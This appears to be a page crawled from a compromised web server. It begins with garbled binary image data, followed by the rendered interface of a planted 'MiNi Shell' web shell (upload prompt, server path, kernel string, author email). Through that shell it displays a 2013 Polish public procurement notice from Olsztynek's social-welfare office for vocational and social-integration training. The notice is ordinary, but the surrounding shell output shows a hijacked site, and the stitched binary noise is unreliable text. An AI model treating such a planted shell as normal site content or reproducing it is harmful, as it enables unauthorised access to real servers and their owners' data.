JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130520/81921-N-2013.html

<p class="kh_header"><b>Olsztynek: Przeprowadzenie działań aktywnej integracji</b><br>
<b>Numer ogłoszenia: 81921 - 2013; data zamieszczenia: 20.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Świerczewskiego 19, 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 89 519 26 94, faks 89 519 26 94.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.olsztynek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie działań aktywnej integracji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług szkoleniowych dla 60 osób (w 2013 - 30 osób w tym 15 os. w wieku od 15 do 30 lat i 15 os. z rodzin dysfunkcyjnych, w 2014 - 30 osób w tym 15 os. w wieku od 15 do 30 lat i 15 os. z rodzin dysfunkcyjnych) zamieszkałych na terenie gminy Olsztynek, zagrożonych wykluczeniem społecznym, korzystających ze świadczeń pomocy społecznej.
W ramach przedmiotu zamówienia wykonawca zobowiązuje się do:
a) przygotowania szczegółowego programu, planu i harmonogramu oraz materiałów
szkoleniowych i dydaktycznych,
b) realizacji poszczególnych zadań, w tym szkoleń, kursów i doradztwa przez
wykwalifikowaną kadrę dydaktyczną i specjalistów w danej dziedzinie, z
uwzględnieniem specyfiki osób szkolonych,
c) koordynacji oraz nadzoru merytorycznego i metodycznego nad realizowanymi
zadaniami,
d) bieżącej współpracy z Zamawiającym w zakresie związanym z realizacją zamówienia,
e) prowadzenia dokumentacji związanej z realizacją zamówienia, w tym dokumentacji
szkoleń, kursów, doradztwa, ściśle wg wytycznych Zamawiającego,
f) zapewnienia sali szkoleniowej w przypadku kursów zawodowych opisanych w
częściach od 5 do 7 przedmiotu zamówienia, pozostałe szkolenia odbywać się będą w KIS w budynku MOPS w Olsztynku,
g) zapewnienia materiałów szkoleniowych i dydaktycznych dla wszystkich uczestników,
h) zapewnienia w każdym dniu prowadzenia zajęć poczęstunku w formie przerwy
kawowej dla uczestników projektu realizujących kontrakty socjalne. Wykonawcy w
ramach poczęstunku zapewniają kawę, herbatę, zimne napoje i ciastka,
i) zapewnienia ubezpieczenia NNW dla uczestników szkoleń, kursów i doradztwa na
kwotę min. 2000 zł na każdą osobę,
j) wydania uczestnikom szkoleń, kursów i doradztwa zaświadczeń lub świadectw
końcowych na zakończenie udziału,
k) stosowania odpowiednich działań informacyjnych i promocyjnych zgodnie z
wytycznymi i zaleceniami Zamawiającego.
Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 4 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przez Wykonawcę</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek dotyczący posiadania uprawnień do wykonywania
działalności lub czynności objętych niniejszym zamówieniem gdy posiada wpis do
rejestru instytucji szkoleniowych oraz do rejestru agencji zatrudnienia w zakresie
agencji poradnictwa zawodowego (dot. części 1)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek dotyczący wiedzy i doświadczenia, gdy w okresie
ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 1
zamówienie, którego przedmiotem była realizacja warsztatów i kursów, kierowanych
do osób zagrożonych wykluczeniem społecznym, w tym do bezrobotnych lub do
rodzin, o wartości nie mniejszej niż 100 000 zł brutto. Warsztaty i kursy powinny
zawierać zarówno szkolenia miękkie (aktywizujące), jak i kursy zawodowe</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia gdy dysponuje:
w zakresie dotyczącym dysponowania osobami zdolnymi do wykonania
zamówienia posiadającymi niżej wymienione kwalifikacje:
a) (dot. części 6.1 szczegółowego opisu przedmiotu zamówienia - zał. Nr 4 do SIWZ)doradca zawodowy, posiadający:
- wykształcenie wyższe, magisterskie ze studiami podyplomowymi z zakresu
doradztwa zawodowego;
- minimum 3-letnie doświadczenie na stanowisku wykładowcy/trenera;
b) (dot. części 6.5 szczegółowego opisu przedmiotu zamówienia - zał. Nr 4 do SIWZ)trener, który zrealizował co najmniej 5 kursów z elementami języków obcych w ośrodkach administracji publicznej;
c) (dot. części 6.2 szczegółowego opisu przedmiotu zamówienia - zał. Nr 4 do SIWZ)trener z ukończoną szkołą trenerską zakończoną egzaminem;
d) (dot. części 6.3 szczegółowego opisu przedmiotu zamówienia - zał. Nr 4 do SIWZ) osoba, która zrealizowała co najmniej 2 szkolenia o podobnej tematyce,
e) (dot. części 6.4 szczegółowego opisu przedmiotu zamówienia - zał. Nr 4 do SIWZ) osoba, która zrealizowała co najmniej 2 szkolenia o podobnej tematyce,
f) (dot. części 6.6 szczegółowego opisu przedmiotu zamówienia - zał. Nr 4 do SIWZ) osoba, która zrealizowała co najmniej 2 kursy o podobnej tematyce,
g) (dot. części 6.7 szczegółowego opisu przedmiotu zamówienia - zał. Nr 4 do SIWZ) osoba, która zrealizowała co najmniej 2 kursy o podobnej tematyce</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o wpisie do rejestru instytucji szkoleniowych oraz do rejestru agencji
zatrudnienia w zakresie agencji poradnictwa zawodowego - dot. części 1 przedmiotuzamówienia.
Wypełniony formularz oferty zgodny w treści ze wzorem stanowiącym załącznik
nr 1
Wypełniony formularz cenowy zgodny w treści ze wzorem stanowiącym załącznik
nr 5
Program szkoleń i kursów zawodowych
Wypełniony formularz - Wykaz wykonanych warsztatów i kursów - zgodny w treści
ze wzorem stanowiącym załącznik nr 6
Wykaz zakresu zamówienia, która zostanie powierzona podwykonawcom
(w przypadku braku dokumentu Zamawiający uzna, że Wykonawca nie zamierza
powierzyć podwykonawcom wykonania żadnego zakresu zamówienia).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Jakość zaproponowanego programu - 40</li>
<li>3 - Wykształcenie trenerów - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonywania zmian w umowie. Zmiana umowy może być dokonana w granicach wyznaczonych przepisami ustawy, w tym art. 144 ustawy Prawo zamówień publicznych, wyłącznie za zgodą stron, w formie pisemnej pod rygorem nieważności.
2.	Zmiany umowy mogą nastąpić w następujących przypadkach:
1)	zaistnienia omyłki pisarskiej lub rachunkowej;
2)	zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy;
3)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki podatku VAT;
4)	wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, których nie można było przewidzieć przy zachowaniu należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.olsztynek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Olsztynku
ul. Świerczewskiego 19
11-015 Olsztynek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2013 godzina 14:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Olsztynku
ul. Świerczewskiego 19
11-015 Olsztynek
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie o udzielenie zamówienia związane jest z realizacją projektu systemowego pt. Nie jutro lecz dziś w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków z Europejskiego Funduszu Społecznego realizowanego przez Miejski Ośrodek Pomocy Społecznej w Olsztynku w ramach Działania 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Program doradczo - zawodowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program doradczo - zawodowy dla 60 osób tj; 30 osób w wieku 15-30 lat i 30 osób z rodzin dysfunkcyjnych (30 os. tj. 15 osób w wieku 15-30 lat z rodzin dysfunkcyjnych w 2013 r i 30 osób tj.15 osób w wieku 15-30 lat i 15 osób z rodzin dysfunkcyjnych w 2014 r), zajęcia będą prowadzone w KIS w Olsztynku; (szkolenia zlecone zgodnie z PZP) szkolenia odbywać się będzie trzytorowo:
a)indywidualne spotkania doradcze (doradcy zawodowi.)dla 60 os.-1H.x 60 os.(1Hx30os.w 2013r. 1Hx30 os. w 2014r)
b)opracowanie Indywidualnego Planu Działania dla 60 os.-1Hx60 os.(30 os. w 2013 r. i 30 os. w 2014r.) na postawie którego zostaną określone umiejętności zawodowe,
c)warsztaty poszukiwanie pracy i autoprezentacja  dla 60 os.3Hx60 os.(30 os. w 2013 r. i 30 os. w 2014r.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość zaproponowanego programu - 40</li>
<li>3. Wykształcenie trenerów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zarządzanie emocjami i radzenie sobie ze stresem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zarządzanie emocjami i radzenie sobie ze stresem jako instrument aktywizacji zawodowej dla 30 osób w wieku 15-30 l.(15os. w 2013 r. i 15 os. w 2014r)zajęcia będą prowadzone w KIS;(szkolenia zlecone zgodnie z PZP)-80godz.szkol (40H w 2013 r. i 40H w 2014 r.) Szkolenie jest zaprojektowane jako trening umiejętności interpersonalnych. Każdy z uczestników na podstawie przedstawianych technik i metod znajdzie skuteczny dla siebie sposób zarządzania emocjami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość zaproponowanego programu - 40</li>
<li>3. Wykształcenie trenerów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztaty edukacyjno-profilaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty edukacyjno-profilaktyczne jako instrument aktywizacji zawodowej dla 30 osób w wieku 15-30 l.(15os. w 2013 r. i 15 os. w 2014r), zajęcia będą prowadzone w KIS;(szkolenia zlecone zgodnie z PZP)-80godz.szkol (40H w 2013 r. i 40H w 2014 r.). Celem tych warsztatów jest wzrost świadomości i wiedzy z zakresu odpowiedniego kształtowania osób, relacji i mech. zachowań: profilaktyka uzależnień, przeciwdziałaniu przemocy i agresji, rozwijanie świadomości i poszanowania własnej seksualności w bliskich relacjach, prof. chorób roznoszonych drogą płciową, przeciwdziałanie zagrożeniom cyberprzestrzeni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość zaproponowanego programu - 40</li>
<li>3. Wykształcenie trenerów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkoła dla rodziców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia w ramach cyklu: Szkoła dla rodziców jako instrumentu aktywizacji edukacyjnej dla 30 os. z rodzin dysfunkcyjnych (15os. w 2013 r. i 15 os. w 2014r). Zajęcia będą prowadzone w KIS;(szkolenie zlecone zgodnie z PZP)-128godz.szkol (64H w 2013 r. i 64H w 2014 r.). Głównym celem szkoły dla rodziców jest  nauczyć nowego, odkrywczego spojrzenia na wychowanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość zaproponowanego programu - 40</li>
<li>3. Wykształcenie trenerów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> kurs zawodowy - opiekun osób starszych z modułem językowym - język niemiecki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kurs zawodowy - opiekun osób starszych z modułem językowym - język niemiecki. Dla 16 osób z obu grup ( 8 os. w 2013r. i 8 os. w 2014r.), które zostaną zakwalifikowane po badaniach predyspozycji zawodowych. Celem kursu będzie uzyskanie kwalifikacji oraz przygotowania do rozpoczęcia i prowadzenia działalności polegającej na świadczeniu usług w zakresie opieki nad ludźmi chorymi, niepełnosprawnymi oraz osobami starszymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs zawodowy drwal-pilarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zawodowy drwal-pilarz. Dla 10 osób z obu gr.(5 os. w 2013r. i 5 os. w 2014r.), które zostaną zakwalifikowane po badaniach predyspozycji zawodowych. Celem kursu jest zapoznanie teoretyczne z zagadnieniami wyszczególnionymi w programie nauczania oraz przygotowanie praktyczne kursanta do samodzielnej pracy na stanowisku drwala- pilarza.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość zaproponowanego programu - 40</li>
<li>3. Wykształcenie trenerów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs zawodowy - nowoczesny sprzedawca z obsługą komputera i kas fiskalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zawodowy - nowoczesny sprzedawca z obsługą komputera i kas fiskalnych. Dla 10 osób z obu gr. (5 os. w 2013r. i 5 os. w 2014r.), które zostaną zakwalifikowane po badaniach predyspozycji zawodowych. Celem szkolenia jest przyuczenie do pracy sprzedawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość zaproponowanego programu - 40</li>
<li>3. Wykształcenie trenerów - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com